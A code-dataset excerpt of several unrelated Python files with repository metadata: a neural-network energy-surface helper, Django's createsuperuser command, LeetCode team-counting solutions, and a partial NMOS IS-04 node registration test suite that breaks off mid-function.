# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z
# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:
# H H H C C O O
# H
# H 1
# H 2 3
# C 4 5 6
# C 7 8 9 10
# O 11 12 13 14 15
# O 16 17 18 19 20 21
# The returned energy array is a column vector of corresponding energies. Elements can be accessed with E[0,0], E[0,1], E[0,2]
# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.
def pes(geom_vectors, cartesian=True):
g = np.asarray(geom_vectors)
if cartesian:
axis = 1
if len(g.shape) < 2:
axis = 0
g = np.apply_along_axis(cart1d_to_distances1d, axis, g)
newX = nn.transform_new_X(g, params, Xscaler)
x = torch.tensor(data=newX)
with torch.no_grad():
E = model(x)
e = nn.inverse_transform_new_y(E, yscaler)
#e = e - (insert min energy here)
#e *= 219474.63 ( convert units )
return e
def cart1d_to_distances1d(vec):
vec = vec.reshape(-1,3)
n = len(vec)
distance_matrix = np.zeros((n,n))
for i,j in combinations(range(len(vec)),2):
R = np.linalg.norm(vec[i]-vec[j])
distance_matrix[j,i] = R
distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]
return distance_vector
| 45.132353 | 195 | 0.677419 |
0537fb9a5bd7baac9ceb7be117af0d7776052385
| 7,629 |
py
|
Python
|
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
"""
Management utility to create superusers.
"""
from __future__ import unicode_literals
import getpass
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.management import get_default_username
from django.core import exceptions
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS
from django.utils.encoding import force_str
from django.utils.six.moves import input
from django.utils.text import capfirst
class NotRunningInTTYException(Exception):
pass
class Command(BaseCommand):
help = 'Used to create a superuser.'
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
self.username_field = self.UserModel._meta.get_field(self.UserModel.USERNAME_FIELD)
def add_arguments(self, parser):
parser.add_argument('--%s' % self.UserModel.USERNAME_FIELD,
dest=self.UserModel.USERNAME_FIELD, default=None,
help='Specifies the login for the superuser.')
parser.add_argument('--noinput', action='store_false', dest='interactive', default=True,
help=('Tells Django to NOT prompt the user for input of any kind. '
'You must use --%s with --noinput, along with an option for '
'any other required field. Superusers created with --noinput will '
' not be able to log in until they\'re given a valid password.' %
self.UserModel.USERNAME_FIELD))
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS,
help='Specifies the database to use. Default is "default".')
for field in self.UserModel.REQUIRED_FIELDS:
parser.add_argument('--%s' % field, dest=field, default=None,
help='Specifies the %s for the superuser.' % field)
def execute(self, *args, **options):
self.stdin = options.get('stdin', sys.stdin) # Used for testing
return super(Command, self).execute(*args, **options)
def handle(self, *args, **options):
username = options.get(self.UserModel.USERNAME_FIELD, None)
database = options.get('database')
# If not provided, create the user with an unusable password
password = None
user_data = {}
# Do quick and dirty validation if --noinput
if not options['interactive']:
try:
if not username:
raise CommandError("You must use --%s with --noinput." %
self.UserModel.USERNAME_FIELD)
username = self.username_field.clean(username, None)
for field_name in self.UserModel.REQUIRED_FIELDS:
if options.get(field_name):
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = field.clean(options[field_name], None)
else:
raise CommandError("You must use --%s with --noinput." % field_name)
except exceptions.ValidationError as e:
raise CommandError('; '.join(e.messages))
else:
# Prompt for username/password, and any other required fields.
# Enclose this whole thing in a try/except to catch
# KeyboardInterrupt and exit gracefully.
default_username = get_default_username()
try:
if hasattr(self.stdin, 'isatty') and not self.stdin.isatty():
raise NotRunningInTTYException("Not running in a TTY")
# Get a username
verbose_field_name = self.username_field.verbose_name
while username is None:
input_msg = capfirst(verbose_field_name)
if default_username:
input_msg += " (leave blank to use '%s')" % default_username
username_rel = self.username_field.rel
input_msg = force_str('%s%s: ' % (
input_msg,
' (%s.%s)' % (
username_rel.to._meta.object_name,
username_rel.field_name
) if username_rel else '')
)
username = self.get_input_data(self.username_field, input_msg, default_username)
if not username:
continue
try:
self.UserModel._default_manager.db_manager(database).get_by_natural_key(username)
except self.UserModel.DoesNotExist:
pass
else:
self.stderr.write("Error: That %s is already taken." %
verbose_field_name)
username = None
for field_name in self.UserModel.REQUIRED_FIELDS:
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = options.get(field_name)
while user_data[field_name] is None:
message = force_str('%s%s: ' % (capfirst(field.verbose_name),
' (%s.%s)' % (field.rel.to._meta.object_name, field.rel.field_name) if field.rel else ''))
user_data[field_name] = self.get_input_data(field, message)
# Get a password
while password is None:
if not password:
password = getpass.getpass()
password2 = getpass.getpass(force_str('Password (again): '))
if password != password2:
self.stderr.write("Error: Your passwords didn't match.")
password = None
continue
if password.strip() == '':
self.stderr.write("Error: Blank passwords aren't allowed.")
password = None
continue
except KeyboardInterrupt:
self.stderr.write("\nOperation cancelled.")
sys.exit(1)
except NotRunningInTTYException:
self.stdout.write(
"Superuser creation skipped due to not running in a TTY. "
"You can run `manage.py createsuperuser` in your project "
"to create one manually."
)
if username:
user_data[self.UserModel.USERNAME_FIELD] = username
user_data['password'] = password
self.UserModel._default_manager.db_manager(database).create_superuser(**user_data)
if options['verbosity'] >= 1:
self.stdout.write("Superuser created successfully.")
def get_input_data(self, field, message, default=None):
"""
Override this method if you want to customize data inputs or
validation exceptions.
"""
raw_value = input(message)
if default and raw_value == '':
raw_value = default
try:
val = field.clean(raw_value, None)
except exceptions.ValidationError as e:
self.stderr.write("Error: %s" % '; '.join(e.messages))
val = None
return val
| 45.410714 | 119 | 0.551579 |
45cdcf84514e3ad3bde02684e5ebd9629f548833
| 1,326 |
py
|
Python
|
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | 1 |
2020-03-26T13:40:52.000Z
|
2020-03-26T13:40:52.000Z
|
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | null | null | null |
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | null | null | null |
from typing import List
class Solution:
def numTeams(self, rating: List[int]) -> int:
res = 0
for i in range(len(rating) - 2):
for j in range(i+1, len(rating)-1):
for k in range(j+1, len(rating)):
if (rating[i] < rating[j] and rating[j] < rating[k]) or (rating[i] > rating[j] and rating[j] > rating[k]):
res += 1
return res
class Solution2:
def numTeams(self, rating: List[int]) -> int:
"""
整体思想是遍历每个节点查看其本身可以当成中间节点的所有可能
"""
if len(rating) < 3:
return 0
res = 0
for j in range(len(rating) - 1):
scl = 0
scr = 0
bcl = 0
bcr = 0
for i in range(j):
if(rating[i] < rating[j]):
scl += 1
else:
bcl += 1
for k in range(j+1, len(rating)):
if(rating[k] < rating[j]):
scr += 1
else:
bcr += 1
res += scl * bcr + bcl * scr # 左小右大 左大右小
return res
if __name__ == "__main__":
assert Solution2().numTeams([2, 5, 3, 4, 1]) == 3
assert Solution2().numTeams([2, 1, 3]) == 0
assert Solution2().numTeams([1, 2, 3, 4]) == 4
| 26 | 126 | 0.430618 |
dd891e183ca73404e6d211c901431159f14c9743
| 76,171 |
py
|
Python
|
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG
#
# Modifications Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import socket
from requests.compat import json
from urllib.parse import urlparse
from dnslib import QTYPE
from copy import deepcopy
from zeroconf_monkey import ServiceBrowser, ServiceInfo, Zeroconf
from .. import Config as CONFIG
from ..MdnsListener import MdnsListener
from ..GenericTest import GenericTest, NMOSTestException, NMOS_WIKI_URL
from ..IS04Utils import IS04Utils
from ..TestHelper import get_default_ip
NODE_API_KEY = "node"
class IS0401Test(GenericTest):
"""
Runs IS-04-01-Test
"""
def __init__(self, apis, registries, node, dns_server):
GenericTest.__init__(self, apis)
self.invalid_registry = registries[0]
self.primary_registry = registries[1]
self.registries = registries[1:]
self.node = node
self.dns_server = dns_server
self.node_url = self.apis[NODE_API_KEY]["url"]
self.registry_basics_done = False
self.registry_basics_data = []
self.registry_primary_data = None
self.registry_invalid_data = None
self.node_basics_data = {
"self": None, "devices": None, "sources": None,
"flows": None, "senders": None, "receivers": None
}
self.is04_utils = IS04Utils(self.node_url)
self.zc = None
self.zc_listener = None
def set_up_tests(self):
self.zc = Zeroconf()
self.zc_listener = MdnsListener(self.zc)
if self.dns_server:
self.dns_server.load_zone(self.apis[NODE_API_KEY]["version"], self.protocol)
print(" * Waiting for up to {} seconds for a DNS query before executing tests"
.format(CONFIG.DNS_SD_ADVERT_TIMEOUT))
self.dns_server.wait_for_query(
QTYPE.PTR,
[
"_nmos-register._tcp.{}.".format(CONFIG.DNS_DOMAIN),
"_nmos-registration._tcp.{}.".format(CONFIG.DNS_DOMAIN)
],
CONFIG.DNS_SD_ADVERT_TIMEOUT
)
def tear_down_tests(self):
if self.zc:
self.zc.close()
self.zc = None
if self.dns_server:
self.dns_server.reset()
def _registry_mdns_info(self, port, priority=0, api_ver=None, api_proto=None, ip=None):
"""Get an mDNS ServiceInfo object in order to create an advertisement"""
if api_ver is None:
api_ver = self.apis[NODE_API_KEY]["version"]
if api_proto is None:
api_proto = self.protocol
if ip is None:
ip = get_default_ip()
hostname = "nmos-mocks.local."
else:
hostname = ip.replace(".", "-") + ".local."
# TODO: Add another test which checks support for parsing CSV string in api_ver
txt = {'api_ver': api_ver, 'api_proto': api_proto, 'pri': str(priority), 'api_auth': 'false'}
service_type = "_nmos-registration._tcp.local."
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.3") >= 0:
service_type = "_nmos-register._tcp.local."
info = ServiceInfo(service_type,
"NMOSTestSuite{}{}.{}".format(port, api_proto, service_type),
socket.inet_aton(ip), port, 0, 0,
txt, hostname)
return info
def do_node_basics_prereqs(self):
"""Collect a copy of each of the Node's resources"""
for resource in self.node_basics_data:
url = "{}{}".format(self.node_url, resource)
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
try:
self.node_basics_data[resource] = r.json()
except Exception:
pass
def do_registry_basics_prereqs(self):
"""Advertise a registry and collect data from any Nodes which discover it"""
if self.registry_basics_done:
return
if not CONFIG.ENABLE_DNS_SD:
self.do_node_basics_prereqs()
return
if CONFIG.DNS_SD_MODE == "multicast":
registry_mdns = []
priority = 0
# Add advertisement with invalid version
info = self._registry_mdns_info(self.invalid_registry.get_data().port, priority, "v9.0")
registry_mdns.append(info)
# Add advertisement with invalid protocol
info = self._registry_mdns_info(self.invalid_registry.get_data().port, priority, None, "invalid")
registry_mdns.append(info)
# Add advertisement for primary and failover registries
for registry in self.registries[0:-1]:
info = self._registry_mdns_info(registry.get_data().port, priority)
registry_mdns.append(info)
priority += 10
# Add a fake advertisement for a timeout simulating registry
info = self._registry_mdns_info(444, priority, ip="192.0.2.1")
registry_mdns.append(info)
priority += 10
# Add the final real registry advertisement
info = self._registry_mdns_info(self.registries[-1].get_data().port, priority)
registry_mdns.append(info)
# Reset all registries to clear previous heartbeats, etc.
self.invalid_registry.reset()
for registry in self.registries:
registry.reset()
self.invalid_registry.enable()
self.primary_registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise the primary registry and invalid ones at pri 0, and allow the Node to do a basic registration
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") != 0:
self.zc.register_service(registry_mdns[0])
self.zc.register_service(registry_mdns[1])
self.zc.register_service(registry_mdns[2])
# Wait for n seconds after advertising the service for the first POST from a Node
start_time = time.time()
while time.time() < start_time + CONFIG.DNS_SD_ADVERT_TIMEOUT:
if self.primary_registry.has_registrations():
break
if self.invalid_registry.has_registrations():
break
time.sleep(0.2)
# Wait until we're sure the Node has registered everything it intends to, and we've had at least one heartbeat
while (time.time() - self.primary_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1 or \
(time.time() - self.invalid_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1:
time.sleep(0.2)
# Collect matching resources from the Node
self.do_node_basics_prereqs()
# Ensure we have two heartbeats from the Node, assuming any are arriving (for test_05)
if len(self.primary_registry.get_data().heartbeats) > 0 or len(self.invalid_registry.get_data().heartbeats) > 0:
# It is heartbeating, but we don't have enough of them yet
while len(self.primary_registry.get_data().heartbeats) < 2 and \
len(self.invalid_registry.get_data().heartbeats) < 2:
time.sleep(0.2)
# Once registered, advertise all other registries at different (ascending) priorities
for index, registry in enumerate(self.registries[1:]):
registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
for info in registry_mdns[3:]:
self.zc.register_service(info)
# Kill registries one by one to collect data around failover
self.invalid_registry.disable()
for index, registry in enumerate(self.registries):
registry.disable()
# Prevent access to an out of bounds index below
if (index + 1) >= len(self.registries):
break
# in event of testing HTTPS support, the TLS handshake seems to take nearly 2 seconds, so
# when the first registry is disabled, an additional few seconds is needed to ensure the node
# has a chance to make a connection to it, receive the 5xx error, and make a connection to
# the next one
if CONFIG.ENABLE_HTTPS:
heartbeat_countdown = CONFIG.HEARTBEAT_INTERVAL + 1 + 5
else:
heartbeat_countdown = CONFIG.HEARTBEAT_INTERVAL + 1
# Wait an extra heartbeat interval when dealing with the timout test
# This allows a Node's connection to time out and then register with the next mock registry
if (index + 2) == len(self.registries):
heartbeat_countdown += CONFIG.HEARTBEAT_INTERVAL
while len(self.registries[index + 1].get_data().heartbeats) < 1 and heartbeat_countdown > 0:
# Wait until the heartbeat interval has elapsed or a heartbeat has been received
time.sleep(0.2)
heartbeat_countdown -= 0.2
if len(self.registries[index + 1].get_data().heartbeats) < 1:
# Testing has failed at this point, so we might as well abort
break
# Clean up mDNS advertisements and disable registries
if CONFIG.DNS_SD_MODE == "multicast":
for info in registry_mdns:
self.zc.unregister_service(info)
self.invalid_registry.disable()
for index, registry in enumerate(self.registries):
registry.disable()
self.registry_basics_done = True
for registry in self.registries:
self.registry_basics_data.append(registry.get_data())
self.registry_invalid_data = self.invalid_registry.get_data()
# If the Node preferred the invalid registry, don't penalise it for other tests which check the general
# interactions are correct
if len(self.registry_invalid_data.posts) > 0:
self.registry_primary_data = self.registry_invalid_data
else:
self.registry_primary_data = self.registry_basics_data[0]
def test_01(self, test):
"""Node can discover network registration service via multicast DNS"""
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "multicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'multicast'")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) > 0:
return test.PASS()
return test.FAIL("Node did not attempt to register with the advertised registry.")
def test_01_01(self, test):
"""Node does not attempt to register with an unsuitable registry"""
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") == 0:
return test.NA("Nodes running v1.0 do not check DNS-SD api_ver and api_proto TXT records")
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "multicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'multicast'")
self.do_registry_basics_prereqs()
if len(self.registry_invalid_data.posts) > 0:
return test.FAIL("Node incorrectly registered with a registry advertising an invalid 'api_ver' or "
"'api_proto'")
return test.PASS()
def test_02(self, test):
"""Node can discover network registration service via unicast DNS"""
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "unicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'unicast'")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) > 0:
return test.PASS()
return test.FAIL("Node did not attempt to register with the advertised registry.")
def test_02_01(self, test):
"""Node does not attempt to register with an unsuitable registry"""
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") == 0:
return test.NA("Nodes running v1.0 do not check DNS-SD api_ver and api_proto TXT records")
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "unicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'unicast'")
self.do_registry_basics_prereqs()
if len(self.registry_invalid_data.posts) > 0:
return test.FAIL("Node incorrectly registered with a registry advertising an invalid 'api_ver' or "
"'api_proto'")
return test.PASS()
def test_03(self, test):
"""Registration API interactions use the correct headers"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) == 0:
return test.UNCLEAR("No registrations found")
ctype_warn = ""
for resource in registry_data.posts:
ctype_valid, ctype_message = self.check_content_type(resource[1]["headers"])
if not ctype_valid:
return test.FAIL(ctype_message)
elif ctype_message and not ctype_warn:
ctype_warn = ctype_message
accept_valid, accept_message = self.check_accept(resource[1]["headers"])
if not accept_valid:
return test.FAIL(accept_message)
if "Transfer-Encoding" not in resource[1]["headers"]:
if "Content-Length" not in resource[1]["headers"]:
return test.FAIL("One or more Node POSTs did not include Content-Length")
else:
if "Content-Length" in resource[1]["headers"]:
return test.FAIL("API signalled both Transfer-Encoding and Content-Length")
if ctype_warn:
return test.WARNING(ctype_warn)
else:
return test.PASS()
def test_03_01(self, test):
"""Registration API interactions use the correct versioned path"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) == 0:
return test.UNCLEAR("No registrations found")
for resource in registry_data.posts:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node POSTs used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
for resource in registry_data.deletes:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node DELETEs used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
for resource in registry_data.heartbeats:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node heartbeats used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
return test.PASS()
def get_registry_resource(self, res_type, res_id):
"""Get a specific resource ID from the mock registry, or a real registry if DNS-SD is disabled"""
found_resource = None
if CONFIG.ENABLE_DNS_SD:
# Look up data in local mock registry
registry_data = self.registry_primary_data
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == res_type and resource[1]["payload"]["data"]["id"] == res_id:
found_resource = resource[1]["payload"]["data"]
else:
# Look up data from a configured Query API
url = "{}://{}:{}/x-nmos/query/{}/{}s/{}".format(
self.protocol,
CONFIG.QUERY_API_HOST,
str(CONFIG.QUERY_API_PORT),
self.apis[NODE_API_KEY]["version"],
res_type,
res_id
)
try:
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
found_resource = r.json()
else:
raise Exception
except Exception:
print(" * ERROR: Unable to load resource from the configured Query API ({}:{})".format(
CONFIG.QUERY_API_HOST,
CONFIG.QUERY_API_PORT
))
return found_resource
def get_node_resources(self, res_type):
"""Get resources matching a specific type from the Node API"""
if res_type == "node":
res_type = "self"
else:
res_type = res_type + "s"
resp_json = self.node_basics_data[res_type]
resources = {}
if resp_json is None:
raise ValueError
elif isinstance(resp_json, dict):
resources[resp_json["id"]] = resp_json
else:
for resource in resp_json:
resources[resource["id"]] = resource
return resources
def do_test_matching_resource(self, test, res_type):
"""Check that a resource held in the registry matches the resource held by the Node API"""
try:
node_resources = self.get_node_resources(res_type)
if len(node_resources) == 0:
return test.UNCLEAR("No {} resources were found on the Node.".format(res_type.title()))
for res_id in node_resources:
reg_resource = self.get_registry_resource(res_type, res_id)
if not reg_resource:
return test.FAIL("{} {} was not found in the registry.".format(res_type.title(), res_id))
elif reg_resource != node_resources[res_id]:
return test.FAIL("Node API JSON does not match data in registry for "
"{} {}.".format(res_type.title(), res_id))
return test.PASS()
except ValueError:
return test.FAIL("Failed to reach Node API or invalid JSON received!")
def parent_resource_type(self, res_type):
"""Find the parent resource type required for a given resource type"""
if res_type == "device":
return "node"
elif res_type == "flow" and \
self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") <= 0:
return "source"
elif res_type in ["sender", "receiver", "source", "flow"]:
return "device"
else:
return None
def preceding_resource_type(self, res_type):
"""Find the preceding resource type recommended for a given resource type,
if different than the parent resource type"""
# The recommendation ensures e.g. that a Query API client would find the Source and Flow
# associated with a particular Sender
if res_type == "flow" and \
self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") > 0:
return "source"
elif res_type == "sender":
return "flow"
else:
return None
def do_test_referential_integrity(self, test, res_type):
"""Check that the parents for a specific resource type are held in the mock registry,
and the recommended order for referential integrity has been adhered to"""
api = self.apis[NODE_API_KEY]
# Look up data in local mock registry
registry_data = self.registry_primary_data
parent_type = self.parent_resource_type(res_type)
registered_parents = []
preceding_type = self.preceding_resource_type(res_type)
registered_preceding = []
preceding_warn = ""
found_resource = False
try:
# Cycle over registrations in order
for resource in registry_data.posts:
rtype = resource[1]["payload"]["type"]
rdata = resource[1]["payload"]["data"]
if rtype == parent_type:
registered_parents.append(rdata["id"])
elif preceding_type and rtype == preceding_type:
registered_preceding.append(rdata["id"])
elif rtype == res_type:
found_resource = True
if rdata[parent_type + "_id"] not in registered_parents:
return test.FAIL("{} '{}' was registered before its referenced '{}' '{}'"
.format(res_type.title(), rdata["id"],
parent_type + "_id", rdata[parent_type + "_id"]))
if preceding_type and rdata[preceding_type + "_id"] not in registered_preceding \
and not preceding_warn:
preceding_warn = "{} '{}' was registered before its referenced '{}' '{}'" \
.format(res_type.title(), rdata["id"],
preceding_type + "_id", rdata[preceding_type + "_id"])
if preceding_warn:
return test.WARNING(preceding_warn,
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/4.1._Behaviour_-_Registration.html#referential-integrity"
.format(api["spec_branch"]))
elif found_resource:
return test.PASS()
else:
return test.UNCLEAR("No {} resources were registered with the mock registry.".format(res_type.title()))
except KeyError as e:
return test.FAIL("Unable to find expected key in the registered {}: {}".format(res_type.title(), e))
def test_04(self, test):
"""Node can register a valid Node resource with the network registration service,
matching its Node API self resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "node")
def test_05(self, test):
"""Node maintains itself in the registry via periodic calls to the health resource"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.heartbeats) < 2:
return test.FAIL("Not enough heartbeats were made in the time period.")
initial_node = registry_data.posts[0]
last_hb = None
for heartbeat in registry_data.heartbeats:
# Ensure the Node ID for heartbeats matches the registrations
if heartbeat[1]["node_id"] != initial_node[1]["payload"]["data"]["id"]:
return test.FAIL("Heartbeats matched a different Node ID to the initial registration.")
if last_hb:
# Check frequency of heartbeats matches the defaults
time_diff = heartbeat[0] - last_hb[0]
if time_diff > CONFIG.HEARTBEAT_INTERVAL + 0.5:
return test.FAIL("Heartbeats are not frequent enough.")
elif time_diff < CONFIG.HEARTBEAT_INTERVAL - 0.5:
return test.FAIL("Heartbeats are too frequent.")
else:
# For first heartbeat, check against Node registration
if (heartbeat[0] - initial_node[0]) > CONFIG.HEARTBEAT_INTERVAL + 0.5:
return test.FAIL("First heartbeat occurred too long after initial Node registration.")
# Ensure the heartbeat request body is empty
if heartbeat[1]["payload"] is not bytes():
return test.WARNING("Heartbeat POST contained a payload body.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
if "Content-Type" in heartbeat[1]["headers"]:
return test.WARNING("Heartbeat POST contained a Content-Type header.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
if "Transfer-Encoding" not in heartbeat[1]["headers"]:
if "Content-Length" not in heartbeat[1]["headers"] or \
int(heartbeat[1]["headers"]["Content-Length"]) != 0:
# The NMOS spec currently says Content-Length: 0 is OPTIONAL, but it is RECOMMENDED in RFC 7230
# and omitting it causes problems for commonly deployed HTTP servers
return test.WARNING("Heartbeat POST did not contain a valid Content-Length header.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
else:
if "Content-Length" in heartbeat[1]["headers"]:
return test.FAIL("API signalled both Transfer-Encoding and Content-Length")
accept_valid, accept_message = self.check_accept(heartbeat[1]["headers"])
if not accept_valid:
return test.FAIL(accept_message)
last_hb = heartbeat
return test.PASS()
def test_07(self, test):
"""Node can register a valid Device resource with the network registration service, matching its
Node API Device resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "device")
def test_07_01(self, test):
"""Registered Device was POSTed after a matching referenced Node"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "device")
def test_08(self, test):
"""Node can register a valid Source resource with the network
registration service, matching its Node API Source resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "source")
def test_08_01(self, test):
"""Registered Source was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "source")
def test_09(self, test):
"""Node can register a valid Flow resource with the network
registration service, matching its Node API Flow resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "flow")
def test_09_01(self, test):
"""Registered Flow was POSTed after a matching referenced Device or Source"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "flow")
def test_10(self, test):
"""Node can register a valid Sender resource with the network
registration service, matching its Node API Sender resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "sender")
def test_10_01(self, test):
"""Registered Sender was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "sender")
def test_11(self, test):
"""Node can register a valid Receiver resource with the network
registration service, matching its Node API Receiver resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "receiver")
def test_11_01(self, test):
"""Registered Receiver was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "receiver")
def test_12(self, test):
"""Node advertises a Node type mDNS announcement with no ver_* TXT records
in the presence of a Registration API (v1.0, v1.1 and v1.2)"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
return test.DISABLED("This test is disabled for Nodes >= v1.3")
node_list = self.collect_mdns_announcements()
for node in node_list:
address = socket.inet_ntoa(node.address)
port = node.port
if address == api["ip"] and port == api["port"]:
properties = self.convert_bytes(node.properties)
for prop in properties:
if "ver_" in prop:
return test.FAIL("Found 'ver_' TXT record while Node is registered.")
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
if "api_ver" not in properties:
return test.FAIL("No 'api_ver' TXT record found in Node API advertisement.")
elif api["version"] not in properties["api_ver"].split(","):
return test.FAIL("Node does not claim to support version under test.")
if "api_proto" not in properties:
return test.FAIL("No 'api_proto' TXT record found in Node API advertisement.")
elif properties["api_proto"] != self.protocol:
return test.FAIL("API protocol ('api_proto') TXT record is not '{}'.".format(self.protocol))
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
